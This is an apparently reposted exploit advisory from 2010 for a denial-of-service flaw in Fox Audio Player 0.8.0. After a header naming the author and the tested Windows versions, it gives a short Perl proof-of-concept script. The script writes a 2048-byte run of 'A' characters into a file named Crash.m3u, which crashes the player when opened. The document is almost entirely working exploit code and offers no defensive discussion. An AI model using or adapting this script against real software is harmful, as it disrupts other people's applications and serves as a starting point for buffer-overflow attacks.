Fox Audio Player 0.8.0 .m3u Denial of Service Vulnerability
来源 作者:4n0nym0us 发布时间:2010-09-28
# ######################################################################################### # # # Title: Fox Audio Player 0.8.0 .m3u Denial of Service Vulnerability # # Author: 4n0nym0us (Arash Sa'adatfar) # # Developer: Leandro Nini # # # # Software Link: # # # # Tested On: Windows XP Sp3 32-bit / Windows 7 Ultimate 32-bit # # # ######################################################################################### # #!/usr/bin/perl my $file= "Crash.m3u"; my $junk= "\x41" x 2048; open($FILE,">$file"); print $FILE $junk; print "\nCrash.m3u File Created successfully\n"; close($FILE);
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